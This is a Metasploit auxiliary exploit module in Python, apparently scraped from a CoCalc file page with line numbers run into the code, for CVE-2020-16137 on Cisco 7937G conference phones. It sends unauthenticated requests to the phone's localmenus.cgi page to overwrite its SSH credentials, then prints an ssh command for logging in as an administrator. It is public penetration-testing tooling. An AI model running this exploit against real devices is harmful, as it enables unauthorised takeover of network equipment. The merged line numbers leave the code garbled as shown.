CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.py
Views: 1904
#!/usr/bin/env python31# -*- coding: utf-8 -*-23# standard modules4from metasploit import module5import logging67# extra modules8dependency_missing = False910try:11import requests12except ImportError:13dependency_missing = True141516metadata = {17'name': 'Cisco 7937G SSH Privilege Escalation',18'description': '''19This module exploits a feature that should not be available20via the web interface. An unauthenticated user may change21the credentials for SSH access to any username and password22combination desired, giving access to administrative23functions through an SSH connection.24''',25'authors': [26'Cody Martin'27# Author Homepage: debifrank.github.io28# Organization: BlackLanternSecurity29# Org. Homepage: BlackLanternSecurity.com30],31'date': '2020-06-02',32'license': 'GPL_LICENSE',33'references': [34{'type': 'url', 'ref': 'https://web.archive.org/web/20200921054955/https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'},35{'type': 'cve', 'ref': '2020-16137'}36],37'type': 'single_scanner',38'options': {39'rhost': {'type': 'address',40'description': 'Target address',41'required': True,42'default': ''},43'USER': {'type': 'string',44'description': 'Desired username',45'required': True,46'default': ''},47'PASS': {'type': 'string',48'description': 'Desired password',49'required': True,50'default': ''},51'TIMEOUT': {'type': 'int',52'description': 'Timeout in seconds',53'required': True,54'default': 5}55}56}575859def run(args):60module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))61if dependency_missing:62logging.error('Python module dependency (requests) is missing, cannot continue')63logging.error('Please execute pip3 install requests.')64return6566url = "http://{}/localmenus.cgi".format(args['rhost'])67payload_user = {"func": "403", "set": "401",68"name1": args['USER'], "name2": args['USER']}69payload_pass = {"func": "403", "set": "402",70"pwd1": args['PASS'], "pwd2": args['PASS']}71logging.info("Attempting to set SSH credentials.")72try:73r = requests.post(url=url, params=payload_user,74timeout=int(args['TIMEOUT']))75if r.status_code != 200:76logging.error("Device doesn't appear to be functioning or web access is not enabled.")77return7879r = requests.post(url=url, params=payload_pass, timeout=int(args['TIMEOUT']))80if r.status_code != 200:81logging.error("Device doesn't appear to be functioning or web access is not enabled.")82return83except requests.exceptions.RequestException:84logging.error("Device doesn't appear to be functioning or web access is not enabled.")85return8687logging.info("SSH attack finished!")88logging.info(("Try to login using the supplied credentials {}:{}").format(89args['USER'], args['PASS']))90logging.info("You must specify the key exchange when connecting or the device will be DoS'd!")91logging.info(("ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 {}@{}").format(args['USER'], args['rhost']))92return939495if __name__ == "__main__":96module.run(metadata, run)979899